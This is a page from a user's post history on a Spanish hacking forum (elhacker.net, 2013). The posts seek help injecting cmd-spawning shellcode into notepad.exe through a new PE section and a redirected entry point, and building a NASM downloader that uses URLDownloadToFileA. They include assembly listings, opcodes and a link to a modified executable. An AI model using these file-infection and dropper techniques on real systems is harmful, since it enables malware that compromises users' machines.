elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... 49
91  Seguridad Informática / Análisis y Diseño de Malware / Re: alguien recuerda como se ejecutaba codigo con runPE como explico ferchu? en: 17 Julio 2013, 04:05 am
pues ya logre solucionar esa parte, era borrar 28 hexadecimales pero no sobreescribir, sino insertar 28 hexadecimales para colocar la nueva sección asi todo vuelve a su lugar, tambien modifique el PE, antes era E0 - 28 = B8

tambien uso un codigo en asm de una shell

Código
  1. [BITS 32]                  
  2.  
  3. jmp short cmd                 
  4.  
  5. init:
  6.    mov edx,7634e695h     
  7.    call edx                            
  8.    mov edx,76312acfh      
  9.    call edx                           
  10. cmd:
  11.    CALL init
  12.    db 'cmd',00h  

al compilarlo me aparece la shell sin ningun problema cambiando las direcciones de WinExec y ExitProcess, suspuse que eso era lo que tenia que agregar en el block, asi que tambien modifique el numero del espacio en la sección, ya que habia puesto 17, y los opcodes son 26

despues de modificar eso, agregue los opcode sacados con ollydbg

Código:
CPU Disasm
Address   Hex dump          Command                                  Comments
00401000   . /EB 0E         JMP SHORT 00401010
00401002   $ |BA 95E63476   MOV EDX,7634E695
00401007   . |FFD2          CALL EDX
00401009   . |BA CF2A3176   MOV EDX,76312ACF
0040100E   . |FFD2          CALL EDX
00401010   > \E8 EDFFFFFF   CALL 00401002
00401015   .  636D 64       ARPL WORD PTR SS:[EBP+64],BP
00401018   .  00FF          ADD BH,BH

Código:
EB0EBA95E63476FFD2BACF2A3176FFD2E8EDFFFFFF636D6400FF

pero al ejecutarlo, abre normalmente el block de notas pero no me aparece la shell

leyendo nuevamente el codigo de ferchu pone

Código:
codigo                                OPcodes

Cadena titulo                         "Soy el notepad y estoy infectado!!!\0"
Cadena msg                            "Infectado!!!\0"
call [siguiente instruccion]          E8 00 00 00 00
pop eax                               58
push 0                                6A 00
sub eax, 0x12                         2C 12
push eax                              50
sub eax, 0x24                         2C 24
push eax                              50
push 0                                6A 00
mov eax, 0x77D5050B                   B8 0B 05 D5 77       // B8 + direccion de MessageBoxA
call eax                              FF D0
mov eax, 0x010739D                    B8 9D 73 00 01       // B8 + entry point
jmp eax                               FF E0

asi que quise agregar B8 a las direcciones, pero tampoco se ejecuta la shell

Código:
EB0EBAB895E63476FFD2BAB8CF2A3176FFD2E8EDFFFFFF636D6400FF

Código:
EB0EBA-->B8<--95E63476FFD2BA-->B8<--CF2A3176FFD2E8EDFFFFFF636D6400FF

que podria estar pasando?
92  Programación / ASM / Re: como usar estructuras en nasm? en: 16 Julio 2013, 21:29 pm
ok gracias por los link, ahorita los checo

solo una pregunta, sabes como iniciar la estructura en nasm? porque veo que lo hacen asi en fasm

sa      sockaddr_in <>

pero es lo mismo para nasm?

gracias nuevamente

salu2
93  Seguridad Informática / Análisis y Diseño de Malware / Re: alguien recuerda como se ejecutaba codigo con runPE como explico ferchu? en: 16 Julio 2013, 21:10 pm
lo estoy haciendo manualmente con un editor de hexadecimal, te agradeceria mucho si me puediras explicar esa parte de cambiar el punto de entrada y redirigirlo

te dejo el block de notas que modifique y el codigo hecho en nasm, me imagino que te servira mas el codigo que los opcodes

Estoy usando windows 7 32bits

http://www.mediafire.com/download/ej8gzpqbz9x88bj/notepad.exe

Código
  1. [BITS 32]
  2.  
  3. section .data
  4.  
  5. hola: db 'hola mundo',0
  6. box: db 'user32.dll',0
  7. ldlib: dd '0xFFFFFFFF'
  8. ap: db 'MessageBoxA',0
  9. bbox: dd '0xFFFFFFFF'
  10.  
  11. section .text
  12.  
  13. global _WinMain@16
  14. extern _LoadLibraryA@4
  15. extern _GetProcAddress@8
  16. extern _ExitProcess@4
  17.  
  18. _WinMain@16:
  19.  
  20. xor eax, eax
  21. push box
  22. call _LoadLibraryA@4
  23. mov [ldlib], eax
  24.  
  25. push ap
  26. push dword [ldlib]
  27. call _GetProcAddress@8
  28. mov [bbox], eax
  29.  
  30. push 0
  31. push hola
  32. push hola
  33. push 0
  34. call dword [bbox]
  35.  
  36. push 0
  37. call _ExitProcess@4
94  Programación / ASM / como usar estructuras en nasm? en: 16 Julio 2013, 20:45 pm
hola

alguien me puede decir como usar estructuras en nasm?, lo que estoy tratando de programar es un socket en asm, pero no se como colocar la estructura sockaddr_in en nasm para usar los parametros de .sin_family, .sin_port, etc
95  Seguridad Informática / Análisis y Diseño de Malware / Re: alguien recuerda como se ejecutaba codigo con runPE como explico ferchu? en: 16 Julio 2013, 16:55 pm
es que agregar secciones ya lo hice, solo me hace falta lograr ejecutar opcodes

miren esta imagen de ferchu, elimina 28 hexadecimales y se nota en la imagen, pero luego lo alinea, el problema es que esta muy chica la imagen y no alcanzo a ver con que alinea los demas hexadecimales, en la parte de abajo se ve una linea morada, donde se muestra que esta alienado

http://s1.subirimagenes.com/otros/368697modificado31.jpg

mi problema no es que quiera que me expliquen todo el formate PE, solo esa parte de los 28 hexadecimales, eso es todo
96  Seguridad Informática / Análisis y Diseño de Malware / Re: alguien recuerda como se ejecutaba codigo con runPE como explico ferchu? en: 15 Julio 2013, 07:42 am
hola

pero alguien sabe con que vuelve a llena esos 0x28 hexadecimales?, porque si borro 0x28 obviamente dejare incompleto el archivo, entonces creo el llenaba con algo esos 28 hexadecimales para volver a acomodar los offset en su lugar y dejar el archivo completo, y no recuerdo eso

si borro 28 hexadecimales, que necesito para llenar esos 28 hexadecimales que borre para dejar el archivo con la misma cantidad de hexadecimales?

porque en una imagen se alcanza a ver que borra los 28 hexadecimales, pero tambien se alcanza a ver que despues de los 28 hexadecimales de PE vuelve a acomodar los hexadecimales para que quede todo en su lugar
97  Programación / ASM / Re: que error le encuentran a este codigo en nasm? en: 14 Julio 2013, 16:07 pm
que tonteria hice, ya lo resolvi, olvide poner cero despues de "urlmon.dll" y "URLDownloadToFileA"... ", 0", me imagino que por eso me daba null

bueno, gracias

salu2
98  Programación / ASM / Re: que error le encuentran a este codigo en nasm? en: 14 Julio 2013, 16:00 pm
hola

ya use olly, y creo ya encontre el problema, al poner varios breaks, creo lo que falla es GetProcAddress, en hmodule, tiene un numeros, pero al llegar con el break cambia a NULL, despues avanza y me aparece una violacion de acceso

entonces de que otra forma obtengo GetProcAddress?
99  Programación / ASM / Re: que error le encuentran a este codigo en nasm? en: 14 Julio 2013, 04:29 am
nop, ese no es el problema, olvide la comilla pero ahorita lo arreglo, algo mas que puedan ver?, es que no se que pueda estar mal, o no se si todo el codigo que hice este mal

salu2
100  Programación / ASM / que error le encuentran a este codigo en nasm? en: 14 Julio 2013, 02:21 am
hola

Quise hacer por mi mismo un downloader para practicar asm, pero tengo un problema, nasm no me da ningun error, gcc tampoco pero cuando lo ejecuto, me sale un mensaje de error y se cierra, me podrian decir que fallo le encuentran porfavor?

Código:
[Bits 32]

section .data
remote_file db 'http://www.crackberrista.com/wp-content/uploads/2012/01/hacker.gif',0
local_file db 'hacker.gif',0
url db 'urlmon.dll'
ldlib dd '0xFFFFFFFF'
URDo db 'URLDownloadToFileA'
urd dd '0xFFFFFFFF'

section .text
extern _LoadLibraryA@4
extern _GetProcAddress@8
extern _FreeLibrary@4
extern _ExitProcess@4
global _WinMain@16

_WinMain@16:

push url
call _LoadLibraryA@4
mov [ldlib], eax

push URDo
push dword [ldlib]
call _GetProcAddress@8
mov [urd], eax

push 0
push 0
push local_file
push remote_file
push 0
call [urd]

call _FreeLibrary@4

push 0
call _ExitProcess@4
ret 16
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... 49
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines